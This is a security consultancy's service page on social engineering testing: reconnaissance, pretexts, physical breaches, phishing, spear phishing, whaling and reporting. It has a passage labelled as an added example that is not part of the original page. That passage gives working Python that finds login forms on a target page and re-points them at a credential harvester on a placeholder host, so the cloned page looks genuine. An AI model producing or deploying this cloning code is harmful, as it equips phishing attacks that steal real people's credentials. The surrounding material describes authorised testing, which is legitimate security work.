It is widely accepted that one of the greatest threats to security is the human element. Enterprises quite rightly invest huge sums in developing secure architectures and deploying secure networks and devices, but fail to sufficiently educate their staff in security best practices. Beyond an annual security awareness e-mail, the topic is rarely given sufficient attention. Internal security awareness programmes are recommended, and they are effective; however, their effect often lasts only a short period before old habits creep back in.
Social engineering offers a way to demonstrate to the business what can result from not keeping security fresh in employees' minds. Social engineering involves attempting to take advantage of any weakness in security, whether physical security, such as a server room door being left ajar, or cyber security, such as a staff member opening a phishing e-mail.
Social engineering engagements can be scoped to be as extensive as the client is comfortable with. They can range from purely remote investigations to determine what can be obtained about and from the organisation, to attempts at breaking into the client premises and gaining access to their internal network or secret files. All boundaries are agreed with the client beforehand.
Physical social engineering
A typical social engineering engagement will begin with reconnaissance against the client organisation. This phase is designed to collect as much information as possible to allow the consultants to create a convincing pretext. The reconnaissance involves researching employees, open roles, software used by the company, or anything else that may allow the consultant to gain access to information. For engagements where the client has requested a physical breach, the consultant will use this phase to research the client offices using open source tools and in-person investigation.
The engagement will then proceed into the exploitation phase, where the consultants will begin their attempts to gain sensitive information or physical access to the client offices. Consultants may pretend to work for the client, work for a utilities company, or any other convincing pretext in this phase.
Cyber social engineering
Phishing testing is typically conducted externally (Internet-based). In rare cases, usually at the client's request, the testing can instead be conducted from inside the client network.
The typical aim of any phishing engagement is to use staff as the route to highly privileged access to the target network, through malicious e-mails. Phishing will usually start with Open Source Intelligence gathering and the development of a pretext.
Open Source Intelligence (OSINT) is the use of publicly available internet sources to gather information about a target, such as employee names, contact information, internal documents and anything else that may prove useful to an attacker.
A pretext is then developed: the story used to justify the next stage of the test, which depends on the type of test chosen. For phishing exercises, this may involve trawling news sites for information about the target company, or scanning the target company's websites for login forms that can be used to create realistic-looking login pages.
Finally, a phishing server is set up to harvest the credentials. This server can be hosted in the cloud, on ProCheckUp hardware or, in rare cases, on client infrastructure if required. Connections to this server are encrypted, and the harvested data is securely deleted once the test has been conducted.
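The login-form discovery and page-cloning step described above, as an added example that is not ProCheckUp's tooling and not part of the original page: it parses a target page's HTML for forms that contain a password field (the ones worth cloning), resolves each form's submit URL against the page's base URL, and rewrites a copy of the page so that those forms post to the consultant's harvesting server while the rest of the page stays untouched. The HTML sample and the hostnames intranet.example.com and login-portal.example.net are constructed for the demonstration.

```python
"""Find login forms in a target page and re-point them at a credential harvester."""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample page standing in for a fetched target login page (not real data).
TARGET_BASE = "https://intranet.example.com/"
HARVESTER_URL = "https://login-portal.example.net/submit"   # hypothetical harvesting endpoint
SAMPLE_HTML = """<html><body>
<form action="/search" method="get"><input name="q" type="text"></form>
<form action="/auth/login" method="POST">
  <input name="username" type="text">
  <input name="password" type="password">
  <input name="csrf" type="hidden" value="abc123">
  <button type="submit">Sign in</button>
</form>
</body></html>"""


class LoginFormFinder(HTMLParser):
    """Collects every <form> that contains an <input type="password">."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names are lower-cased by HTMLParser
        if tag == "form":
            raw_action = a.get("action", "")
            self._current = {
                "raw_action": raw_action,                       # as written in the page
                "action": urljoin(self.base_url, raw_action),   # absolute submit URL
                "method": a.get("method", "get").lower(),
                "fields": [],                                   # (name, type) pairs
                "has_password": False,
            }
        elif tag == "input" and self._current is not None:
            itype = a.get("type", "text").lower()
            name = a.get("name")
            if name:
                self._current["fields"].append((name, itype))
            if itype == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            if self._current["has_password"]:
                self.forms.append(self._current)
            self._current = None


def find_login_forms(html, base_url):
    """Return the forms in `html` that carry a password field, with resolved actions."""
    parser = LoginFormFinder(base_url)
    parser.feed(html)
    parser.close()
    return parser.forms


def clone_for_harvester(html, base_url, harvester_url):
    """Return a copy of the page whose login form(s) submit to `harvester_url`.

    Only the action attribute of password-bearing forms is rewritten, so the cloned page
    keeps the target's own branding and layout and looks genuine. The harvester must accept
    the same field names (here username, password and the hidden csrf token) so the
    submission flow mirrors the real site.
    """
    cloned = html
    for form in find_login_forms(html, base_url):
        old = 'action="%s"' % form["raw_action"]
        new = 'action="%s"' % harvester_url
        cloned = cloned.replace(old, new)
    return cloned


if __name__ == "__main__":
    for form in find_login_forms(SAMPLE_HTML, TARGET_BASE):
        print(form["method"].upper(), form["action"], [n for n, _ in form["fields"]])
    print(clone_for_harvester(SAMPLE_HTML, TARGET_BASE, HARVESTER_URL))
```

On a live engagement the page would be fetched from the in-scope target rather than embedded, the clone served over TLS from the agreed harvesting host, and the captured submissions stored only for as long as the report needs them, in line with the encryption and secure-deletion commitments above.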
Phishing engagements will then usually consist of one or more of the following tests.
Phishing consists of sending e-mails to members of an organisation in an attempt to obtain credentials or install malware within the target organisation. Targets can be identified by the consultants through OSINT or, in most cases, provided by the client directly.
Spear phishing is an exercise targeted at a particular department. This will usually be the IT department or helpdesk, as those users tend to have elevated privileges.
Whaling is a phishing exercise targeted at a single high-value target (the "whale"), such as the company CEO or another high-ranking board member. These people are targeted because of the access their role entails, or because they have access to company financial information.
Social Engineering Reporting
Once an engagement has been completed, the consultants will produce a final deliverable consisting of a technical and a management-level report. The final report will include details of all compromises, recommendations, and supporting evidence. In cases where consultants have successfully compromised data, security awareness training can be delivered to the client.
Please contact us for more information on how ProCheckUp Social Engineering Services can help you.